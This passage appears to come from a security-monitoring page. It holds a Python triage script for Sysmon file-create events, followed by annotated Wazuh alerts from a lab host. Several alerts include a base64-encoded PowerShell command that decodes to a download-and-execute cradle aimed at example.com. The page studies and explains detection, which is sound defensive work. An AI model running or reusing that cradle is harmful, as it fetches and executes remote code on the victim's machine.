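# Assumed allow-list seeded from this page's __PSScriptPolicyTest_ hits; each entry
# pins the file-name pattern to the image that is allowed to create it.
KNOWN_BENIGN = [
    (
        # PowerShell writes __PSScriptPolicyTest_<random>.<random>.ps1/.psm1 into
        # %TEMP% at startup to test whether AppLocker/WDAC enforces script policy.
        re.compile(r"\\AppData\\Local\\Temp\\__PSScriptPolicyTest_[a-z0-9]+\.[a-z0-9]+\.psm?1$", re.I),
        re.compile(r"\\(powershell|pwsh)\.exe$", re.I),
        "PowerShell AppLocker/WDAC policy probe",
    ),
]

# Extensions that "dropped executable" logic treats as executable content (assumed subset).
EXEC_EXT = (".exe", ".dll", ".ps1", ".psm1", ".vbs", ".js", ".bat", ".cmd", ".scr", ".hta")
# User-writable staging folders that malware favours (assumed subset).
WATCHED_DIRS = re.compile(
    r"\\(AppData\\Local\\Temp|AppData\\Roaming|Downloads|Users\\Public|ProgramData)\\", re.I)


@dataclass
class Verdict:
    label: str   # "benign-known" | "suspicious" | "ignore"
    reason: str


def triage_file_create(image: str, target: str) -> Verdict:
    """Classify one Sysmon EID 11 by (creating image, target path)."""
    for name_re, image_re, why in KNOWN_BENIGN:
        if name_re.search(target):
            if image_re.search(image):
                return Verdict("benign-known", why)
            # A benign-looking name from the wrong process is more interesting, not less.
            return Verdict("suspicious", "known-benign file name written by unexpected image " + image)
    if not target.lower().endswith(EXEC_EXT):
        return Verdict("ignore", "not an executable or script extension")
    if WATCHED_DIRS.search(target):
        return Verdict("suspicious", "executable content written to a user-writable staging folder")
    return Verdict("ignore", "executable content outside watched folders")


# First two events copied from the EID 11 alerts on this page; the rest are constructed.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ibqrrzzz.zs1.ps1"},
    {"image": r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3tsd2bll.s43.ps1"},
    {"image": r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",      # constructed: real drop
     "target": r"C:\Users\Attcker1\AppData\Local\Temp\update.exe"},
    {"image": r"C:\Users\Attcker1\Downloads\setup.exe",                           # constructed: wrong writer
     "target": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_aaaaaaaa.bbb.ps1"},
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",     # constructed: not executable
     "target": r"C:\Users\Attcker1\AppData\Local\Temp\~WRD0001.tmp"},
]


def triage_all(events: List[Dict[str, str]]) -> List[str]:
    """Labels for a batch of events, in input order."""
    return [triage_file_create(e["image"], e["target"]).label for e in events]


if __name__ == "__main__":
    for event, label in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        print(f"{label:13} {event['target']}")
```

Run as a post-processing step on the EID 11 stream, the "benign-known" verdict should lower the file alert, not the process alert: the PowerShell that created the probe file is still the one carrying the encoded command.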

data.win.eventdata.creationUtcTime:  2025-04-24 22:37:58.543
Creation timestamp from the filesystem. Equal to utcTime here, so the file was genuinely new; an earlier value means an existing file was overwritten.

data.win.eventdata.user:  Attacker\\Attcker1
DOMAIN\user the process runs as. Here the domain part equals the hostname, so this is a local account; pivot on it across the other alerts.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:03.469+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:03.469+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  63
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534283.1531501
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means eventID follows Sysmon numbering, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon provider. Useful for filtering if the provider name is ever localised or spoofed.

data.win.system.eventID:  1
Event ID in the provider's numbering. The provider is Sysmon, so 1 = ProcessCreate (Sysmon's richer counterpart to Security 4688), not a classic Security-log ID.

data.win.system.version:  5
Schema version of the event template. Sysmon bumps it when fields are added (version 5 of EID 1 is the one that carries ParentUser), so it governs which eventdata fields you can expect.

data.win.system.level:  4
ETW level; 4 = Informational. Sysmon writes nearly everything at 4, so this carries no severity signal.

data.win.system.task:  1
Task category. For Sysmon it simply repeats the event ID (1 = ProcessCreate), unlike the Security log's Logon / Policy Change categories.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:00.8075389Z
UTC time the record was written to the event log. Normally trails eventdata.utcTime by milliseconds to seconds; a large gap hints at buffering or clock drift.

data.win.system.eventRecordID:  284198
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service itself, not the process being reported on. It is 3712 in every alert here, which confirms that.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Rarely useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in. Microsoft-Windows-Sysmon/Operational is what the Wazuh agent's Sysmon localfile entry collects.

data.win.system.computer:  Attacker
Hostname as stamped in the event. Should equal agent.name; a mismatch means a forwarded log or a mis-enrolled agent.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:37:59.419 ProcessGuid: {94294ddc-bd47-680a-610b-000000000e00} ProcessId: 15132 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd44-680a-5d0b-000000000e00} ParentProcessId: 5188 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Full event text as rendered by the Sysmon provider. Every data.win.eventdata.* field below is parsed out of this string; fall back to it when a parsed field looks truncated or mis-escaped.

data.win.eventdata.utcTime:  2025-04-24 22:37:59.419
Sysmon's own UTC timestamp for the action (process creation or file creation). Compare it with the alert timestamp to see agent-to-manager delay; for ordering events on the host, prefer this field.

data.win.eventdata.processGuid:  {94294ddc-bd47-680a-610b-000000000e00}
Sysmon's unique ID for the process. PIDs get recycled; this value does not, so use it to join this event with EID 11/3/7 from the same process and to walk parentProcessGuid chains.

data.win.eventdata.processId:  15132
Windows PID. Reused once the process exits, so only trust it next to processGuid or within a tight time window.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable. Check it really is the System32 powershell.exe: look-alike names or user-writable locations are a red flag; confirm with hashes.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource of the binary (10.0.26100 is the Windows 11 24H2 / Server 2025 build). Pair it with hashes to confirm a genuine Microsoft build.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Attacker-controlled on non-Microsoft binaries, so corroborate rather than trust.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource. Same caveat as description: easy to forge, useful only as corroboration.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd44-680a-5d0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  5188
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:03.522+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:03.522+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  67
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534283.1539568
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:01.2115486Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284199
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:01.067 ProcessGuid: {94294ddc-bd47-680a-610b-000000000e00} ProcessId: 15132 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1iubx32l.gko.ps1 CreationUtcTime: 2025-04-24 22:38:01.067 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:01.067
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd47-680a-610b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15132
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1iubx32l.gko.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:01.067
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:38:04.258+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:04.258+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['3.3', '8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534284.1542337
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26157
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Detailed File Share' is set to include 'Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory allows you to audit attempts to access files and folders on a shared folder. Events for this subcategory include: - 5145: network share object was checked to see whether client can be granted desired access. The recommended state for this setting is to include: Failure.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing the Failures will log which unauthorized users attempted (and failed) to get access to a file or folder on a network share on this computer, which could possibly be an indication of malicious intent.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit Detailed File Share
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  3.3,8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Detailed File Share"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Detailed File Share"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:10.134+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:10.134+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  64
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534290.1545402
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:07.6419042Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284255
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:02.808 ProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00} ProcessId: 10844 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd47-680a-610b-000000000e00} ParentProcessId: 15132 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:02.808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd4a-680a-660b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10844
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
